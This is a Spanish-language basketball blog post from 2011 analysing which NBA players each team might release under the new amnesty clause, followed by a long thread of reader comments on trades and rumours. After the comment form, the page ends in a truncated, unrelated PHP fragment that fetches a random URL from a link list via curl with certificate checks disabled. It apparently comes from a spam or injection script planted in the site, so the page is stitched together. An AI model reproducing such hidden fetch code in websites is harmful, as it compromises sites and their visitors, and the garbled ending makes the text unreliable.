¿Quién dijo pérdidas?

01 de December de 2011 por TheDeerHunter

Hace no muchos siglos tuvimos unos propietarios que estaban dispuestos a paralizar la liga porque no les daba el dinero para afrontar tanto gasto. Según ellos era más rentable que no hubiera NBA. Sin saber muy bien cómo el panorama ha cambiado sutilmente… y lo que se lleva ahora es preparar ofertazas como si no hubiera un mañana  mientras suenan los más desquiciados rumores. Se habla de franquicias de medio pelo que se preparan para arrasar el mercado. ¿Pérdidas? ¿”Lo cualo”?

Sin embargo no venimos a hablar de ello hoy. Para hacer más rentable la película no hay como inventar nuevas fórmulas de quemar literalmente el dinero. Con todos vosotros la fabulosa Cláusula de Amnistía… o cómo pagarle millonadas a un fulano para que no acuda a su puesto de trabajo. ¿Cómo no se nos había ocurrido antes? Esto es solucionar la crisis y lo demás son tonterías. Y ojo que la jugada no es novedad. ¡Barra libreee!

Sin entrar a valorar las connotaciones éticas, lógicas ni fisiológicas del asunto nos limitaremos a hacer un repasito de las opciones que tienen los distintos equipos para hacer efectiva tal maravillosa y visionaria idea:

Atlanta Hawks: Casi 66 kilos comprometidos en 9 jugadores (sin entrar a la renovación de Jamal Crawford) que vienen a ser casi -8 kilos de margen. Para algunos el peor contrato tóxico que tienen son los 120 kilos que le van a soltar repartidos en 5 años a Joe Johnson, pero tendría narices pagárselos mientras te acribilla a triples vestido con otra camiseta. Tienen la opción de Zaza Pachulia en 10 kilos en dos años por menos de 18 minutos de juego o también los 7,5 por 3 de Marvin Williams. Teniendo en cuenta que no es mi dinero, que no resulta fácil contratar hombres grandes útiles y que Williams me parece un bluf de cuidado me decantaría por esta opción.

Boston Celtics: Los $6.2 millones de Jermaine O’neal parecen una opción evidente. El año pasado jugó tan sólo 24 partidos de regular y 18 minutos por partido. Sus mejores años pasaron.

Charlotte Bobcats: Cagadas del “Air” en modo GM. Hay donde elegir. ¿Qué locura es que Desagana Diop vaya a cobrar aún 14 kilos los dos próximos años? También podría elegir a Maggette o Diaw que cobran un pastón, pero al menos ellos son mínimamente útiles.

Chicago Bulls: Podrían optar por Korver o por Ronnie Brewer. Ambos rondan los 5×2 y, aunque no son pesos muertos como otros tampoco han aportado lo que se podría esperar de ellos.

Cleveland Cavaliers: No va a ser fácil que Baron Davis abdique de buen rollo en beneficio de Irving. Se habla mucho de él y sería muy doloroso quemar 30 kilos para que lo disfruten los Lakers pero igual en términos prácticos salen ganando teniendo en cuenta que de igual forma van a pelear por el nº1 del próximo draft.

Dallas Mavericks: Cuban nunca se ha quejado del pastizal que ha tenido que meter en sus equipos. Los “sólo” 34 kilos pendientes de Brendan Haywood, su decepcionante rendimiento en Dallas y las renovaciones que debe acometer son la panacea.

Denver Nuggets: Mucho margen pero muchas renovaciones pendientes. Se ha hablado de André Miller pero me parecería un error tremendo. Según necesidades los 28 kilos en 4 años de Al Harrington sería un recurso, pero sólo si está verdaderamente justificado.

Detroit Pistons: Creo sinceramente que le deben a Rip Hamilton la carta de libertad después de lo que les ha dado y cómo se lo hicieron pasar el año pasado. La cuenta sube a 25 kilos y con ella termina una buena lista de desagravios a los últimos Pistons campeones. En otras condiciones deberían haber ido como locos a librarse de Villanueva o Gordon. ¡Vaya dos, Daimiel!!

Golden State Warriors: Me hubiera encantado recomendar que largaran a Radmapaquete pero ya se habían librado de él. Para lo que aporta Charlie Bell 4 kilos parecen un exceso. También se habla mucho de Biedrins y sus 9×3.

Houston Rockets: En principio no necesitarían ejecutar a Thabeet y sus $5 millones de sueldo. Quizás hasta logren encontrar alguna utilidad a todo un nº2 de draft. No deberían cortar a nadie.

Indiana Pacers: Tampoco están obligados a hacer nada, aunque Posey claramente no vale 7 kilos ahora mismo.

Los Angeles Clippers: Según cómo les salga la renovación de DeAndre o como quieran entrar al mercado de agentes libres estarían más o menos obligados a ejecutar la cláusula. No termino de digerir bien que se hable de tirar el último año de Kaman (aunque son 12 kilos y muchas lesiones) como tampoco sería justo cortar a Mo Williams (aunque confieso que no me entusiasma). Si van muy justos no sé si Ryan Gomes o Randy Foye servirían. Me parecen lo más prescindible de la plantilla.

Los Angeles Lakers: El personal se centra en contribuir a la paz mundial largando a Metta World Peace, antes conocido como Ron Artest. Sin embargo, si Walton no decide retirarse mucho me temo que deberían librarse de esos 12 millones que todavía resta por pagarle.

Memphis Grizzlies: La única opción posible de la que podrían tirar si necesitaran margen salarial sería OJ Mayo. A pesar de su temporada relativamente decepcionante regalar un jugador de ese talento a sus rivales es mucho lujo para una franquicia como ésta.

Miami Heat: Con 45 kilos/año invertidos en el Big Three y subiendo cada dólar cuenta, sin embargo la única opción significativa sería la de Mike Miller. Estamos hablando de 6×4 kilos y tampoco ha resultado indiscutible su rendimiento.

Milwaukee Bucks: $3.5 kilos por Shaun Livingston que no les van a sacar ni de pobres ni de ricos.

Minnesota Timberwolves: Sería tentador tanto largar a Beasley como a Milicic (aunque hay que decir que tampoco lo han hecho demasiado mal) Pero me parece que puede ser una buena opción largar a Brad Miller y sus 10 kilos en dos años.

New Jersey Nets: Algún cazero-powa debería de estar temblando por la creación de esta Amnistía. Travis Outlaw debería tener un punto de mira en su foto… Si no fuera porque tengo pocas dudas de que estará brindando con el mejor champán ahora mismo por unas maravillosas vacaciones pagadas (a 7 kilos de reloj cada una de las 4 temporadas) ¿Será por dinero ruso??

New Orleans Hornets: Con todas las dificultades económicas públicas de la franquicia sería bastante pasote que se les ocurriera cortar los casi 40 kilos de Okafor o los casi 22 de Ariza. Les resta Jarrett Jack, que son 11 kilos. Si hacen algo será con él.

New York Knicks: Si propusiera que corten a Melo igual le daba un “jamacuco” a alguno… Como la idea es cazar a CP3 el verano que viene podría bastar con cortar a Renaldo Blackman. Con casi toda probabilidad lo harán.

Oklahoma City Thunder: Para lo que han gastado a Nate Robinson sus 4.5$ millones pueden servir bien para otra cosa.

Orlando Magic: El despilfarro hecho plantilla… no tienen ni para empezar con esta cláusula. Pueden elegir entre más de 62 kilos en Arenas, casi 35 con Turkoglu o si quieren cortarse un pelo cerca de 11 kilos con Duhon. Mareante lo que podría costar todo eso el próximo curso en términos reales.

Philadelphia 76ers: Tiene toda la pinta que Nocioni será inmediatamente exjugador de la franquicia.

Phoenix Suns: Cuando miro lo que cobra Josh Childress y lo que ha hecho en Phoenix no sé porqué me viene a la mente un cazo… o un braguetazo. 27 kilos en 4 años ¡por Dios de mi vida!!! Se hablaba también de liarla con Vince… también disponen de otras interesantes opciones como Warrick o Pietrus.

Portland TrailBlazers: Es triste decirlo pero no se puede evitar considerar a Brandon Roy en este debate. Son casi 50 kilos en un hombre irrecuperable (al nivel). En este caso más vale perder que más perder.

Sacramento Kings: Tienen pocas necesidades de margen salarial (si acaso al contrario). Sin embargo si por una de esas quisieran liarla gorda en el mercado primero pensaría en Francisco García y segundo en John Salmons. 12 y 24 kilos respectivamente y no tengo muy claro que los valgan.

San Antonio Spurs: En una franquicia con tan buen ojo para fichar el caso Richard Jefferson es una mancha. Blanco y en botella…

Toronto Raptors: Alguno habla de Amir Johnson, que está claro que es un pastizal importante. Vería más factible Kleiza o Leandrinho, que tienen ya medio pie fuera.

Utah Jazz: Suena con mucha fuerza Mehmet Okur (11 kilos) y tendría un impacto inmediato en las cuentas y en la planificación deportiva de la franquicia.

Washington Wizards: A no ser que tuvieran pensado arrasar el mercado ya dijimos que no tiene mucho sentido lo de Rashard Lewis. Es difícil que los Wizards utilicen esta opción.

Comenta

46 comentarios a esta entrada

  1. Diestro dice:
    #1

    Yo creo que habrá mas de una sorpresa con la nueva clausula, va a ser divertido ver los cortes de los equipos.
    Según tengo entendido, el jugador va a seguir ganando lo mismo, una parte la tendrá que pagar el actual equipo y otra parte la tendrá que pagar el equipo que haga la oferta por el.

    ¿Podría ser que algunos equipos utilizaran esta clausula para hacer transpasos gratis? ¿sin necesidad de cuadrar salarios ni tener que recibir nada a cambio? En principio saldrían perdiendo porque no recibirían nada a cambio, pero en años con un mercado de agentes libre interesante, un equipo podría desprenderse de un jugador bien valorado, sabiendo que la oferta que va a recibir sea muy cercana a lo que cobra actualmente (con lo cual el equipo que se desprende del jugador no pierde mas que al propio jugador. similar a que se acabase su contrato) , pero gana margen para ir a por los agentes libres.

    Seguro que no me he enterado muy bien, pero si lo he entendido me parece que abre un abanico de posibilidades mas allá de librarse de contratos “tóxicos”.

      Citar

  2. TheDeerHunter dice:
    #2

    La cláusula hay que ejecutarla ahora o nunca. Así que sólo vale para ahora y anunciándolo a priori. También un único caso, así que las alternativas quedan bastante limitadas.

      Citar

  3. Diestro dice:
    #3

    Pensaba que era anual, jajaja. Ya me he enterado, aun así sigo pensando que podría haber sorpresas en jugadores en los que nadie esta pensando.

    Por ejemplo descartas a Joe Johnson en Atlanta. Suponiendo que si sale al mercado por la amnistía habría mas de un equipo que estaría dispuesto a pagarle, (voy a inventármelo porque no tengo ni idea de su valor actual de mercado, aunque teniendo en cuenta que renovó el año pasado lo mismo no es tan descabellado) 100 millones por 5 años de contrato (repito que lo mismo exagero, pero para que entendáis con el ejemplo mis dudas).

    En este caso, Atalanta tendría que pagar 20 millones (quien los tuviera) pero se libra de su contrato si quisiera por mucho menos de lo que les costaría en realidad.

    Bueno, yo aviso, luego si salta la sorpresa … jajajaja, que imaginacion tengo.

    Saludos a todos

      Citar

  4. GreenPride dice:
    #4

    Por lo que he visto la cláusula se puede usar durante los 2 próximos años así que es inútil usarla en jugadores que vayan a acabar contrato el año que viene por poner un ejemplo salvo que sean casos muy sangrantes y que no haya otro posible tío a largar en la franquicia.
    Yo creo que finalmente no será una clausula tan usada como creemos y sólo acabará usándose en casos muy puntuales. Si no es así, y los propietarios se volvieran locos a gastar puede que tengamos 15 días muy divertidos antes de que empiece la temporada

      Citar

  5. TheDeerHunter dice:
    #5

    Diría que está por decidir los términos exactos de la cláusula en cuanto a hasta cuando se podría hacer efectiva, pero creo que lo único que se contempla es cortar a un único jugador por franquicia

      Citar

  6. Txusma dice:
    #6

    Efectivamente según el borrado del convenio solo se puede cortar a un jugador y a mi me da que se podrá hacer durante todo el convenio pero solo con jugadores con contrato antiguo.
    Sobre la opción Joe Johnson la clave es, ¿cuanto le pagarían ahora? 12 kilos? 14 kilos? Eso significaría que los Hawks le tendrían que pagar 6-8 kilos mínimo durante 5 años y además deberían enfrentarse a él (q tampoco es un manta). Cierto que se quedarían por debajo del límite pero tendrían que fichar bien para cubrir su ausencia. A nivel económico es una ruina.
    Es un caso similar al de Calderon, que alguien comentaba que a lo mejor los Raptors lo ‘amnistiaban’. Pagarle 6 kilos a un tio (considerando que algun equipo le pague 4) durante 2 años, enfrentarse a él y además tener que fichar a un sustituto… No sé, no sé… Como dice GreenPride veo poco equipos utilizando esta opción y solo con jugadores con contratos muy por encima de su rendimiento.

      Citar

  7. Cocinitas dice:
    #7

    Yo creo que a los que realmente les ha bendecido la virgen es a los Magic, si cortan a Arenas y se refuerzan quizá consigan convencer a Howard (aunque lo dudo y mucho), aún así si consiguen un buen traspaso por Howard no estarian tan ahogados para comenzar la reconstrucción.

      Citar

  8. Txusma dice:
    #8

    Rumor: Eric Gordon + DeAndre Jordan + Aminu x Howard…

      Citar

  9. Nacho dice:
    #9

    Pues es una putada que solo se pueda cortar a un jugador. Yo, como GM de los Heat, estaba pensando en cortar a Wade, LeBron y Bosh para hacerme un equipazo con Bargnani, Vujajic y Barbosa (éste para el mercado latino), pero veo que me voy a joder con mis tres mantas. ¡Vaya por dios!
    No, si al final los que os metiáis con los propietarios teníais razón, quitarle pasta a los jugadores del RBI para poder gastarse más en estos menesteres. Publican por ahí que quienes han obligado a los jugadores a firmar mediante coacción han sido Arenas y Lewis entre otros.

      Citar

  10. Esteban dice:
    #10

    Txusma:
    Rumor: Eric Gordon + DeAndre Jordan + Aminu x Howard…

    no seria ilogico, aunque te digo q no entenderia bien a los clippers, ya tienen un interno determinante y jordan podria ayudarlo, manteniendo a gordon desde afuera

    griffin y howard serian una dupla fantastica, pero hay que ver con que se lo acompaña en el perimetro, MO+FOYLE+GOMES? no entrarian a PO

      Citar

  11. Vader dice:
    #11

    Txusma:
    Rumor: Eric Gordon + DeAndre Jordan + Aminu x Howard…

    De cabeza si fuera Clippers… Con el espacio salarial que tendrian pueden fichar muy buenos jugadores durante un par de años para rodear esa pareja interior que seria la mejor de la liga.

    Ojala mis Knicks consideraran traspasar a Stat por Howard y hacer un: CP3, Melo, Howard. Eso seria anillo seguro.

    Saludos

      Citar

  12. Nacho dice:
    #12

    ¡Como flipo con los Knicksmaniacos! ¿En serio soñáis con juntar a esos tres? y si los juntáis, ¿en serio pensáis que por eso ya ganaréis? ¿No os ha bastado lo de Miami? Pensad en crear un equipo, (para eso sobra alguien antes que jugadores de ida y vuelta, – como nos pasa a los del Atleti, que ni juntado a Messi y a Ronaldo ganaríamos sin soltar el lastre que nos inunda-) ¿Quien ganó el anillo el año pasado? ¿Nowitzki y quien más? Pues el alemán, y un equipo. Tresestrellas por si solas no garantizan nada. ¡Si hasta Jordan jugaba en un equipo!
    Saludos, y no os lo toméis a mal, me caen simpáticos los Knicks. Normal, soy del Atleti, los que menos soñamos, eso sí de junio a septiembre mucho, pero a las seis jornadas matemáticamente ya no podemos ser campeones. Eso que ganáis los de NY, podéis soñar hasta que lleguen los PO. ¡Si hasta en eso mola más la NBA!

      Citar

  13. melo15 dice:
    #13

    Si emos visto lo que a pasao en miami que an llegao a la final te parece poco?
    Pero bueno yo tampoco aria un big three no me gustan(se cual sea) lo que aria si fuera el GM de los knics seria poner a Stat de pivot vender a turiaf i a jeffries i comprar dos ala-pivots decentes i despues otro jugador de perimetro util EQUIPAZO

      Citar

  14. Sempren dice:
    #14

    Estoy de acuerdo contigo, Nacho, aunque ese Big Three está mejor compensado que el Wade, LeBron y Bosh, tanto posicionalmente como en funciones (un claro distribuidor, un tío que juega dentro, no como Bosh, y Melo a lo suyo), aunque los tres necesiten sus tiros.

    melo15, me he aguantado hasta aquí, pero no puedo resistirme a preguntarte si piensas un poco lo que escribes.
    Quieres vender a Turiaf y Jeffries y conseguir tres tíos decentes. Venga ya! Que Turiaf ni siquiera tuvo éxito en un equipo huérfano de interiores (Warriors o los propios Knicks), a ver quién lo va a querer…

      Citar

  15. Txusma dice:
    #15

    Pues parece que Chris Paul ya ha dicho que no piensa firmar una extensión por los Hornets y ha pedido ser traspasado a los Knicks. A ver como lo hacen sin tocar a Melo ni Amare. Entiendo que BIllups (último año de contrato), Landry Fields, Iman Shumpert y tropecientas rondas se irán para allá como mínimo.

    Y Deron tampoco renovará x los Nets. Al acabar la temporada se convertirá en agente libre. Duro golpe para los Nets. No sé si todavía podrán convercelo con algún fichaje de relumbrón.

      Citar

  16. Nacho dice:
    #16

    Propongo un debate:
    Se habla mucho de la posible salida de Howard, Vaya por delante que a mí no me entusiasma en demasía el muchachito. Eso sí, creo que tiene 23 o 24 años, con lo que a este ritmo será la leche en tres o cuatro años, quizás más determinante que LeBron. Con lo que…
    ¿Que pensáis que es mejor para su carrera? ¿Salir o quedarse en Orlando? ¿Actitud Nowitzki, o actitud LeBron?
    Yo creo que le pueden llegar los títulos quedándose en Orlando, dos o tres años máximo. Eso sí, la franquicia tiene que hacer buenos movimientos. Los hechos hasta ahora no han estado mal sobre el papel (otra cosa son los resultados), y hablamos de una franquicia que lleva una final y siempre en la pomada en los últimos años. Creo, que en su caso, lo mejor es quedarse en Florida.

    A Melo: dije de los que hablabáis del anillo, no de la final, por eso el ejemplo de Miami.

      Citar

  17. Txusma dice:
    #17

    Dwight cumple 26 la semana que viene. Ahora mismo Orlando tiene un panorama muy negro por delante en forma de los contratazos de Arenas y Turkoglu. Cierto que podrían utilizar la cláusula de Amnistia con estos 2 en 2011 y 2012 pero eso implicaría poner una buena cantidad de pasta encima de la mesa. Vamos, a mi no me dan buena espina. Sin Howard (y con otro buen pivot estilo Bogut o Kaman) creo que no serían ni equipo de playoffs.

      Citar

  18. Blade Petrovic dice:
    #18

    Este año ganan los wolves o los cavs.

      Citar

  19. Jose Luis dice:
    #19

    Blade Petrovic:
    Este año ganan los wolves o los cavs.

    El nº1 del draft no? xD

      Citar

  20. Vader dice:
    #20

    En fin vaya negocio los Nets… y luego os meteis con los Knicks juas juas juas

    @Nacho

    Tio, que venimos de las catacumbas de no estar en playoff durante años… Juntar a 3 estrellas de esa talla es como mínimo estar en la pomada durante muchos años y luego la suerte dira. Pero de no entrar a playoff pasamos en dos años a tener equipazo, lo hubiera firmado con los ojos cerrados hace 1 año y medio…

      Citar

  21. Melo15 dice:
    #21

    Bueno david west esta libre i es decente i si yo fuera el me ira a los knicks sin pensarlo playoffs aseguraos i en una pedazo ciudad que influye mucho

      Citar

  22. Vader dice:
    #22

    Ni mucho menos creo que los Knicks esten interesados en West.

      Citar

  23. Sancho88 dice:
    #23

    Bueno, yo hablo de lo que sé, o eso creo. Sacramento Kings, ok García y John Salmons, cobran por encima de sus posibilidades, y más con la llegada de Fredette y Honeycutt, que habrá que sacarles a la cancha digo yo, pero realmente, no creo que a los pobres Kings les convenga utilizar esta cláusula, que tiren con lo que tienen e intenten fichar por fin un base que valga la pena. Yo no quiero soñar a trasnochado, pero un Baron Davis, a pesar de su salario, le vendría de perlas para ordenar a esta jauría de jóvenes individualistas que son los Kings, dirigidos penósamente por Westphal desde el banquillo, y encima ahora se va Dalembert. A ver si lo repescan con una excepción de esas mid level, porque Thompson y Cousins tienen calidad, pero no defienden ni una mierda, sobre todo Cousins. A ver si esta temporada no se cree que es ‘buzzerbeaterman’, porque hay que ver la de partidos que palmaron el año pasado por sus 1×1 faltando 30 segundos sin venir a cuento y perdiendo la pelota… en fin, sin grandes esperanzas de nuevo, pero lo que digo, con todo ese salario por cubrir, más que en amnistías (con la que les está cayendo económicamente, ahora está por ver que les pague la pasta Power Balance), necesitan llegar al 85 x cien del salario mínimo, y espero que sea con uno de estos: Baron Davis, Mo Williams o el que sea, alguien que ponga paz en la anarquía.

    X cierto, sé que a partir del lunes comienza el hervidero de fichajes. Os acordáis de una liga llamada hoops que íbamos a jugar este año? Yo no digo más, jeje. A ver si os curráis un post de esa liga para completar las franquicias y nos viciamos totalmente. Os parece que reimpulsemos la idea?

      Citar

  24. Toni dice:
    #24

    Y en la pareja Stat (de center) y David West (de 4), defiendo yo? Si a eso le añadimos la extraordinariamente pasiva defensa de Melo en muchos minutos de la RS, los knicks se irian a 110 encajados por partido, facil. Ojo, que posiblemente de los alrededor de 45-50 tiros que se cascarían entre los tres metieran 70-80 puntos y otros 15-20 de Douglas (que creo que explotará definitivamente esta temporada si no fichan a CP3), podrían estar en el ajo muchos partidos, pero creo que no llegarían a ningun lado. La opción “segura” es CP3 o bien esperarse a final de temporada y traerse a Williams cuando acabe contrato Billups…

    Por cierto, la pareja Howard-Griffin sería el negocio de la decada para el Sr Stern y podría marcar una época en los top-10, pero ¿su juego se adaptaría? ninguno de los dos tiene un tiro aceptable de media distancia (a no ser que Griffin se haya pegado todo el lockout tirando con ricky) y ambos basan su juego en el potencial físico… Aunque no seré yo quien vetase esa dupla, ¡qué gozada para el espectador!

      Citar

  25. TheDeerHunter dice:
    #25

    X cierto, sé que a partir del lunes comienza el hervidero de fichajes. Os acordáis de una liga llamada hoops que íbamos a jugar este año? Yo no digo más, jeje. A ver si os curráis un post de esa liga para completar las franquicias y nos viciamos totalmente. Os parece que reimpulsemos la idea?

    La liga sigue en marcha… de hecho estamos a 6 equipos para colgar el cartel de no hay plazas (a no ser que decidamos ampliarla a 30, aunque no sé si es lo más recomendable)
    Sin embargo yo casi prefiero no vincularla tanto al blog… como mucho en algunos comentarios si acaso. Al fin y al cabo en el blog hay gente que participa y mucha otra que se la trae al peiro.
    A los de la liga estad atentos porque todo puede empezar en pocos días.

      Citar

  26. Sancho88 dice:
    #26

    Gracias por la info, shurmano

      Citar

  27. German dice:
    #27

    Me interesa apuntarme a la liga Deer, como hago?

      Citar

  28. TheDeerHunter dice:
    #28

    German:
    Me interesa apuntarme a la liga Deer, como hago?

    Ves a http://hoops.sports.ws/ te das de alta, buscas la liga Blog_TJNBA (clave tj32) y creas un equipo en ella

      Citar

  29. Txusma dice:
    #29

    Os falta gente? Yo es que no tengo nada tiempo pero podemos poner un anuncio en twitter…

      Citar

  30. German dice:
    #30

    Muchas gracias, ya me registre en la liga!

      Citar

  31. melo15 dice:
    #31

    No sabia que west no defendia pero decidme a alguien para poner dentro con stat porque con paul de base sera una mierda porque no tendriamos ni juego interior ni banquillo i os digo yo que melo va a defender con los knicks

      Citar

  32. Sancho88 dice:
    #32

    melo15:
    No sabia que west no defendia pero decidme a alguien para poner dentro con stat porque con paul de base sera una mierda porque no tendriamos ni juego interior ni banquillo i os digo yo que melo va a defender con los knicks

    Melo, voy a hacer el chiste del día. Debería ir acompañado de risas enlatadas, ya que es un chiste norteamericano, xd. Que defienda Kurt Thomas. UUUUUUUUUUUUUUUUUUUU. JAJAJ. Pues el tío todo motivado explicó este verano que el quería pasar a la historia de los Kincks como Debuscheere, Frazier, etc. Que se daba un aire a ellos. Motivación, es su segundo apellido.

      Citar

  33. melo15 dice:
    #33

    No lo e pillao quien queria pasar a la historia de los knicks

      Citar

  34. Sancho88 dice:
    #34

    el bueno de Kurt…

      Citar

  35. melo15 dice:
    #35

    Ok pero dime que arias tu si fueras el GM de los knicks pero no me digas nada de formar big threes. Otra cosa

      Citar

  36. Toni dice:
    #36

    Jugando a ser manager en la gran manzana, no ficharía a Paul y apostaría por Marc para formar un tándem interior muy equilibrado con un perímetro formado por Melo, Fields y Douglas. Intentaría incorporar a algun amnistiado de turno (si se confirma Baron sería perfecto para dejar a Douglas de 6o hombre, o bien en caso de que Roy fuera el elegido por Portland, sería él mismo un sexto hombre ideal si las rodillas se lo permiten). Por último, intentaría completar una rotación decente con algún interior al estilo Big Baby.

      Citar

  37. melo15 dice:
    #37

    Perfecto pero un base mas joven porque davis para eso te queda con billups a mi mola un monton flynn sabeis quien es i a los rockets precisamente les sobra un base porque ya tienen a lowry
    Creeis que flynn puede llegar a ser un buen base

      Citar

  38. Sancho88 dice:
    #38

    Goran Dragic?? xd. Mas locos a los Knicks no, por favor. Ese equipo necesita paz y relajación de las cabezas… ya habían dado un paso adelante con Fields. Vamos, sería esperable un fichaje como ese, ya que es el segundo base de los Rockets y aparte un perfil muy aclamado por Knicks en las últimas décadas. A mí jamás se me olvidará Zach Randolph encarándose a Isiah Thomas después de un cambio, amenazándole con el dedo, o el bueno de Marbury boicoteando los viajes en avión, gordo Curry en la grada comiendo pipas… si llegara ese base que le sobra a los Rockets, el espectáculo estaría asegurado, ajaja. A mi me parece muy inteligente lo que propone Toni, aparte que Marc es un pívot muy solidario y ya ha demostrado que no es nada egoísta y podría complementarse con un abusón como es Amare

      Citar

  39. melo15 dice:
    #39

    Okok pero yo decia flunn

      Citar

  40. melo15 dice:
    #40

    Okok pero yo decia flynn

      Citar

  41. CAMPO2 dice:
    #41

    Txusma:
    Pues parece que Chris Paul ya ha dicho que no piensa firmar una extensión por los Hornets y ha pedido ser traspasado a los Knicks. A ver como lo hacen sin tocar a Melo ni Amare. Entiendo que BIllups (último año de contrato), Landry Fields, Iman Shumpert y tropecientas rondas se irán para allá como mínimo.

    Y Deron tampoco renovará x los Nets. Al acabar la temporada se convertirá en agente libre. Duro golpe para los
    Nets. No sé si todavía podrán convercelo con algún fichaje de relumbrón.

      Citar

  42. CAMPO2 dice:
    #42

    Y Deron tampoco renovará x los Nets. Al acabar la temporada se convertirá en agente libre. Duro golpe para los
    Nets. No sé si todavía podrán convercelo con algún fichaje de relumbrón.

    Dijo que no renovaría hasta ver el equipo que hacen, cosa lógica porque para quedarse con los matados que hay ahora mejor otro equipo

      Citar

  43. Sancho88 dice:
    #43

    CAMPO2:
    Y Deron tampoco renovará x los Nets. Al acabar la temporada se convertirá en agente libre. Duro golpe para los
    Nets. No sé si todavía podrán convercelo con algún fichaje de relumbrón.

    Dijo que no renovaría hasta ver el equipo que hacen, cosa lógica porque para quedarse con los matados que hay ahora mejor otro equipo

    Deron se merece todo lo peor después del desplante que tuvo con Jerry. Que lo aspen. A mi me encantaría que se convirtiese en un Mcgrady de la vida, vagando de equipo en equipo y que pasara a englosar la lista de los jugadores malditos sin anillos como Barkley, Malone, etc. Ellos se merecieron el anillo, pero este es un fulano que hizo dimitir a un señor del baloncesto, podía gustar más o menos, pero Sloan marcó una época. Deron se merece que Brook López coja 0,5 rebotes por noche y Vujacic falle diez triples por noche. Ojalá pase un año to jodido allí y luego en verano se lo piyen los kings y desaparezca el equipo y se meta en la droga. jajaja.

      Citar

  44. Vader dice:
    #44

    No renueva ahora pq con el nuevo convenio es más rentable firmar la renovación al acabar la temporada. Esta por ver que hara, eso si, el equipo que más dinero le podra ofrecer seran los Nets.

    Saludos

      Citar

  45. Vader dice:
    #45

    Y por cierto a mi no me importaria para nada que Deron fuera a los Knicks y tambien se cargara al entrenador… 😀

      Citar

  46. Nacho dice:
    #46

    Si es por cargarse al entrenador que se venga para el atleti y ya que está aquí juege en el Estu, que molaría tenerlo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>